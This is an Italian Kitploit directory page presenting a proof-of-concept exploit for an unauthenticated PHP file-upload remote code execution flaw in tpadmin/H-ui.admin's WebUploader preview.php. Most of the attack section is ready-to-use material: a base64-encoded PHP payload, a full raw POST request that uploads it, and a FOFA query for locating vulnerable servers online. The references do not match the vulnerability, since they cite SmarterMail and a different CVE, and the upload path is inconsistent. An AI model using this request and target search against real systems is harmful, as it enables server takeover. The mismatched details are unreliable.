Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
tpadmin-CVE-2026-2113-poc — Una vulnerabilità di Remote Code Execution che consente ad attaccanti non autenticati di caricare file PHP arbitrari direttamente sul web server. Ciò comporta un'immediata Remote Code Execution con i privilegi del web server. | Kitploit
Strumenti/GitHubGitHub/maxmnml/tpadmin-cve-2026-2113-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubmaxmnml/tpadmin-cve-2026-2113-poc

tpadmin-CVE-2026-2113-poc

Una vulnerabilità di Remote Code Execution che consente ad attaccanti non autenticati di caricare file PHP arbitrari direttamente sul web server. Ciò comporta un'immediata Remote Code Execution con i privilegi del web server.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
17 mesi faNon ancora revisionato
Condividi

tpadmin-CVE-2026-2113-poc

Una prova di concetto che sfrutta un'esecuzione remota di codice con privilegi del server web tramite caricamento arbitrario di file.

Descrizione della vulnerabilità

Esiste una vulnerabilità critica di esecuzione remota di codice nel componente di anteprima WebUploader del sistema H-ui.admin. Il file <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> non dispone di una corretta autenticazione e validazione dei file, consentendo ad attaccanti non autenticati di caricare file PHP arbitrari direttamente sul server web. Ciò comporta un'esecuzione remota di codice immediata con i privilegi del server web.

Versioni interessate

  • tpadmin fino alla versione 1.3.12

Poc (di sTy1H)

  1. Costruisci il payload (Codifica l'istruzione pericolosa in base64)
root@kitploit:~
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
  1. Costruisci la richiesta POST con il nostro payload
root@kitploit:~
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
  1. Visita l'URL restituito
immagine

In natura

FOFA:

root@kitploit:~
title='Tpadmin'

Impatto

Un attaccante remoto non autenticato può sfruttare un caricamento arbitrario di file per ottenere un'esecuzione remota di codice con i privilegi del server web.

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

Rimedio e mitigazione

Non ci sono informazioni note su possibili contromisure. Potrebbe essere consigliabile sostituire l'oggetto interessato con un prodotto alternativo.

Riferimenti

  • https://github.com/yuan1994/tpAdmin
  • https://www.smartertools.com/smartermail/release-notes/current)
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale.

Scarica lo strumento